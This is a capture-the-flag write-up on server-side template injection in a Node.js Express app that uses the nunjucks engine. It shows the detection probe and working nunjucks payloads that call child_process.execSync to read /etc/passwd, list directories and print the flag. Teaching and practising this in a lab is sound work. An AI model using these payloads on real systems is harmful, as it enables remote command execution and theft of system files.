Tags: ssti web nodejs
Rating: 3.0
In this challenge, no files were provided, only an URL to access. Accessing it:
data:image/s3,"s3://crabby-images/ef0b2/ef0b29d62a7b393a29fd73589c825dfc0989426e" alt="Alt text"
a simple HTML page is served with an input box. Interacting with it, we are sent to another page
data:image/s3,"s3://crabby-images/ee1c7/ee1c7622bb2d2aeebf3e095298b10e0a951404e0" alt="Alt text"
that is just displaying the content that comes in the *payload* query parameter. Looking at the response headers:
data:image/s3,"s3://crabby-images/852a2/852a213986f2a8bf1be16c6fa47beddf15749abe" alt="Alt text"
there is an *X-Powered-By: Express* header. If we search for that in Google, we will find out that is related to NodeJS [Express](https://expressjs.com/) framework.
To solve the challenge, the title is the clue "SunSet introspecTIon". If we remove the lower case letters, we will get *SSTI* that translates to [Server Side Template Injection](https://portswigger.net/research/server-side-template-injection). The other clue was the [nunjucks](https://mozilla.github.io/nunjucks/) in the description, which is a template engine for Js.
To be sure that the challenge is indeed related to an SSTI vulnerability, we can test it out with `{{7*7}}` that after render should result in 49 being served.
data:image/s3,"s3://crabby-images/433bb/433bb9ea5df657b3dba96e82159ab4ee47fa02a7" alt="Alt text"
and it is indeed that. Now we need to find a way to execute commands there, and we can use a great resource for that, Hacktricks. <https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#nunjucks>
```js
{{range.constructor("return global.process.mainModule.require('child_process').execSync('cat /etc/passwd')")()}}
```
will result in
data:image/s3,"s3://crabby-images/5b5a6/5b5a6f2999ec43f4a2078c076db1ec52d248017c" alt="Alt text"
Now, we just need to find the flag
```js
// List the current directory
{{range.constructor("return global.process.mainModule.require('child_process').execSync('ls -la')")()}}
// Get the flag contents
{{range.constructor("return global.process.mainModule.require('child_process').execSync('cat flag')")()}}
```
data:image/s3,"s3://crabby-images/cf4cf/cf4cffc48e897b92d5c26ac05efd119d10084e20" alt="Alt text"